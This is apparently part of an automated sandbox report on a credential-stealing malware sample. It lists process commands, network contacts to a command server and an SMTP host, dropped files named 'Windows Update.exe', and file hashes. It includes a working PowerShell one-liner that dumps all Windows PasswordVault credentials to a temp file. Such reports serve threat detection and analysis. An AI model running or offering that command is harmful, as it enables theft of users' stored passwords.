"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Users\Admin\AppData\Local\Temp\cmdc.exe
"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Users\Admin\AppData\Local\Temp\cmdc.exe
"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | astatech-cn.com | udp |
| GB | 78.110.166.82:80 | astatech-cn.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 8.8.8.8:53 | wshsoft.company | udp |
| SG | 194.59.164.67:80 | wshsoft.company | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 8.8.8.8:53 | whatismyipaddress.com | udp |
| US | 104.16.154.36:80 | whatismyipaddress.com | tcp |
| US | 8.8.8.8:53 | mail.legacypharma.com.pk | udp |
| DE | 49.12.122.233:587 | mail.legacypharma.com.pk | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| DE | 49.12.122.233:587 | mail.legacypharma.com.pk | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
| US | 192.3.53.74:7121 | 192.3.53.74 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\fthost.exe
| MD5 | a0f830df411d0bd29cc9417c61e32be5 |
| SHA1 | c03c055c20f08ff9da4ccb56433c722eb981d088 |
| SHA256 | ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa |
| SHA512 | e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e |
memory/2768-115-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\fthost.exe
| MD5 | a0f830df411d0bd29cc9417c61e32be5 |
| SHA1 | c03c055c20f08ff9da4ccb56433c722eb981d088 |
| SHA256 | ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa |
| SHA512 | e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e |
memory/2768-118-0x0000000000900000-0x0000000000901000-memory.dmp
C:\Users\Admin\AppData\Roaming\Windows Update.exe
| MD5 | a0f830df411d0bd29cc9417c61e32be5 |
| SHA1 | c03c055c20f08ff9da4ccb56433c722eb981d088 |
| SHA256 | ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa |
| SHA512 | e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e |
memory/2004-119-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Windows Update.exe
| MD5 | a0f830df411d0bd29cc9417c61e32be5 |
| SHA1 | c03c055c20f08ff9da4ccb56433c722eb981d088 |
| SHA256 | ded7aa698a9f7a28de12e9a68e69b8fa666474af3e85ca8e2b133cb6ad8cdcfa |
| SHA512 | e774634596b5b007445e6a1b75f40e178125c71fee4d6bd61f55c03f8f5e3f8f3ccabbf369781e9a0a76fe09e93e06b89943614c5c59d091b699488406c5bf2e |
memory/2004-122-0x0000000002D40000-0x0000000002D41000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\SysInfo.txt
| MD5 | 3c77678429c241c59376b4b284bfa90f |
| SHA1 | 5e23f969a6e5071334c2fff7c1a5cc8b4a1f0633 |
| SHA256 | d4408efc9b2e8d03cc3ed7234204c241acd033aa6014ae1804c1df3ffcc8e9f1 |
| SHA512 | f8853fbe92f7b3cf13270ebbcc281226a59a522c8b9dc6b87f9c74168f4dec8eb4db7f952887cf86591bbfbce9768c14d4dec75af41200842ac5611a4fe7a0c1 |
memory/1972-124-0x0000000000400000-0x000000000041B000-memory.dmp
memory/1972-125-0x0000000000411654-mapping.dmp
memory/2004-127-0x0000000002D44000-0x0000000002D46000-memory.dmp
memory/2004-126-0x0000000002D41000-0x0000000002D42000-memory.dmp
memory/1972-128-0x0000000000400000-0x000000000041B000-memory.dmp
memory/600-129-0x0000000000400000-0x0000000000458000-memory.dmp
memory/600-130-0x0000000000442628-mapping.dmp
memory/600-131-0x0000000000400000-0x0000000000458000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\holderwb.txt
| MD5 | f94dc819ca773f1e3cb27abbc9e7fa27 |
| SHA1 | 9a7700efadc5ea09ab288544ef1e3cd876255086 |
| SHA256 | a3377ade83786c2bdff5db19ff4dbfd796da4312402b5e77c4c63e38cc6eff92 |
| SHA512 | 72a2c10d7a53a7f9a319dab66d77ed65639e9aa885b551e0055fc7eaf6ef33bbf109205b42ae11555a0f292563914bc6edb63b310c6f9bda9564095f77ab9196 |
memory/3952-133-0x0000000000000000-mapping.dmp
memory/3952-138-0x0000022142EE0000-0x0000022142EE2000-memory.dmp
memory/3952-139-0x0000022142EE3000-0x0000022142EE5000-memory.dmp
memory/3952-140-0x000002215B1B0000-0x000002215B1B1000-memory.dmp
memory/3952-143-0x000002215B360000-0x000002215B361000-memory.dmp
memory/3952-144-0x000002215B2F0000-0x000002215B2F1000-memory.dmp
memory/3952-151-0x000002215B3E0000-0x000002215B3E1000-memory.dmp
memory/3952-152-0x0000022142EE6000-0x0000022142EE8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp.txt
| MD5 | c416c12d1b2b1da8c8655e393b544362 |
| SHA1 | fb1a43cd8e1c556c2d25f361f42a21293c29e447 |
| SHA256 | 0600d59103840dff210778179fdfba904dcb737a4bfdb35384608698c86ea046 |
| SHA512 | cb6d3636be4330aa2fd577c3636d0b7165f92ee817e98f21180ba0c918eb76f4e38f025086593a0e508234ca981cfec2c53482b0e9cc0acfa885fefbdf89913c |
memory/3776-155-0x0000000000000000-mapping.dmp
memory/1300-156-0x0000000000000000-mapping.dmp
memory/2528-157-0x0000000000000000-mapping.dmp
memory/2976-158-0x0000000000000000-mapping.dmp
memory/652-159-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\cmdc.exe
| MD5 | 54e8ded7b148a13d3363ac7b33f6eb06 |
| SHA1 | 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9 |
| SHA256 | 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342 |
| SHA512 | bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349 |
C:\Users\Admin\AppData\Local\Temp\cmdc.exe
| MD5 | 54e8ded7b148a13d3363ac7b33f6eb06 |
| SHA1 | 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9 |
| SHA256 | 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342 |
| SHA512 | bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349 |
C:\Users\Admin\AppData\Local\Temp\cmdc.cfg
| MD5 | 70e69155b8080b5db35191ab8426d084 |
| SHA1 | 383deaaee90ce71b28b0a6e22124e77aa1cccf8b |
| SHA256 | 104e0212403148a018258ef005a64ec73f0a148dbee230cb5c91dd691d03aefe |
| SHA512 | c718c69454e4d9bcac24c918bf4c7f05ab93910b8a4701bd1dc914a9ca13dffe5f083f30881b5796d239c11be2f8b3e38a7e2ac7dcabc3d9810f59d9228bf342 |
memory/3956-163-0x0000000000000000-mapping.dmp
memory/1528-164-0x0000000000000000-mapping.dmp
memory/3496-165-0x0000000000000000-mapping.dmp
memory/4004-166-0x0000000000000000-mapping.dmp
memory/980-167-0x0000000000000000-mapping.dmp
memory/1804-168-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\cmdc.exe
| MD5 | 54e8ded7b148a13d3363ac7b33f6eb06 |
| SHA1 | 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9 |
| SHA256 | 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342 |
| SHA512 | bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349 |
C:\Users\Admin\AppData\Local\Temp\cmdc.cfg
| MD5 | 70e69155b8080b5db35191ab8426d084 |
| SHA1 | 383deaaee90ce71b28b0a6e22124e77aa1cccf8b |
| SHA256 | 104e0212403148a018258ef005a64ec73f0a148dbee230cb5c91dd691d03aefe |
| SHA512 | c718c69454e4d9bcac24c918bf4c7f05ab93910b8a4701bd1dc914a9ca13dffe5f083f30881b5796d239c11be2f8b3e38a7e2ac7dcabc3d9810f59d9228bf342 |